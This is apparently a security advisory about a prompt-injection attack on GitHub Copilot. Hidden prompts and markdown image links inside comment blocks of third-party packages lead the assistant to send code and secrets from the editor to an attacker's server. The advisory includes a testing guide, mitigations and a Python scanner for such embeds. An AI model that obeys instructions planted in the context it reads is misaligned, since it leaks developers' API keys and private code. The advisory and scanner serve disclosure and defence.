GitHub Copilot Exfiltration via Manipulated Autocomplete Context from Third-Party Dependencies
Overview
Security researchers demonstrated a sophisticated data exfiltration technique targeting users of GitHub Copilot in IDEs like VS Code. The attack vector relies on poisoning the context window that Copilot uses to generate code suggestions.
An attacker first publishes a seemingly benign and useful library to a public package manager (e.g., npm, PyPI). This library contains code with specially crafted, large comment blocks or string literals. These strings contain hidden prompts and markdown-style image embeds pointing to an attacker-controlled server (e.g., `/* ... [!] ... */`).
When a developer imports and uses this library, their IDE's Copilot plugin sends the surrounding code, including the malicious comment block, as context to the Copilot service. The service's backend, which processes this context, is tricked into rendering the markdown image tag. This action triggers an HTTP GET request to the attacker's server.
The researchers found that they could craft the context in such a way that the `<PAYLOAD>` portion of the URL would be populated by Copilot with code from the developer's active editor window, including secrets, API keys, or proprietary business logic. This effectively turns Copilot into a data exfiltration tool, leaking sensitive information from private repositories without any direct user interaction beyond normal coding.
Affected Systems
Testing Guide
1. Create a dummy code file containing a sensitive string, e.g., `API_KEY = "123-secret-abc"`.
2. In the same file, add a comment block copied from a known PoC for this vulnerability, e.g., `// PoC trigger: []`.
3. Set up a listener on `your-test-server.com` to log incoming HTTP requests.
4. Activate Copilot and begin typing near the comment block. Monitor the server logs to see if Copilot makes a request containing parts of your sensitive string.
Mitigation Steps
1. Update the GitHub Copilot extension for your IDE to the latest version. The patch sanitizes context data sent to the backend and implements stricter egress filtering.
2. Vet all third-party dependencies. Use code scanning tools to look for suspicious or heavily obfuscated string literals and comments.
3. Configure network firewalls to block egress traffic from developer machines and CI/CD runners to unknown or untrusted domains.
4. Use Copilot's content exclusion settings to prevent it from accessing sensitive files or repositories.
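A heuristic scanner for mitigation step 2, as an added example that is not part of the original advisory or of any GitHub tooling: it flags comments and string literals in dependency source that embed a markdown image with a remote URL or that exceed a size threshold. The names `scan_source` and `scan_tree`, the 2000-character threshold, the extension list and the sample hosts are assumptions, and the sample file is constructed.

```python
import re
from collections import namedtuple
from pathlib import Path
from urllib.parse import urlsplit

Finding = namedtuple("Finding", "path line rule detail")
# Markdown image embed that fetches from a remote URL: ![alt](https://host/...)
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*(https?://[^\s)]+)")
# Heuristic tokenizer for comments and string literals (not a real parser).
REGION = re.compile(
    r"/\*.*?\*/|//[^\n]*|#[^\n]*"                    # block and line comments
    r'|""".*?"""' r"|'''.*?'''"                      # Python triple-quoted strings
    r'|"(?:\\.|[^"\\\n])*"' r"|'(?:\\.|[^'\\\n])*'"  # quoted string literals
    r"|`(?:\\.|[^`\\])*`",                           # JS template literals
    re.DOTALL,
)
SOURCE_EXT = {".js", ".mjs", ".cjs", ".ts", ".py"}  # assumed set of file types

def scan_source(text, path="<memory>", max_len=2000, allowed_hosts=()):
    """Flag remote image embeds and oversized comments/strings in one file."""
    findings = []
    for m in REGION.finditer(text):
        region = m.group(0)
        start_line = text.count("\n", 0, m.start()) + 1
        for img in MD_IMAGE.finditer(region):
            host = urlsplit(img.group(1)).hostname or ""
            if host not in allowed_hosts:
                line = start_line + region.count("\n", 0, img.start())
                findings.append(Finding(path, line, "remote-markdown-image", host))
        if len(region) > max_len:  # threshold is an assumed starting point
            findings.append(Finding(path, start_line, "oversized-region", str(len(region))))
    return findings

def scan_tree(root, **kwargs):
    """Scan every source file under a dependency directory such as node_modules."""
    findings = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix in SOURCE_EXT:
            findings += scan_source(p.read_text("utf-8", errors="replace"), str(p), **kwargs)
    return findings

# Constructed sample standing in for a file inside a third-party package.
SAMPLE = '''/* utility helpers
   ![status](https://collector.example.invalid/p.png?d=x)
*/
export const logo = "![logo](https://cdn.example.org/logo.png)";
'''

if __name__ == "__main__":
    print(*scan_source(SAMPLE, "sample.js", allowed_hosts={"cdn.example.org"}), sep="\n")
```

Hits are triage leads for manual review of the package, since legitimate libraries also carry long license headers and documentation images.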
Patch Details
Patched in GitHub Copilot VS Code Extension v1.195.0. The patch introduced context sanitization and stricter backend network policies.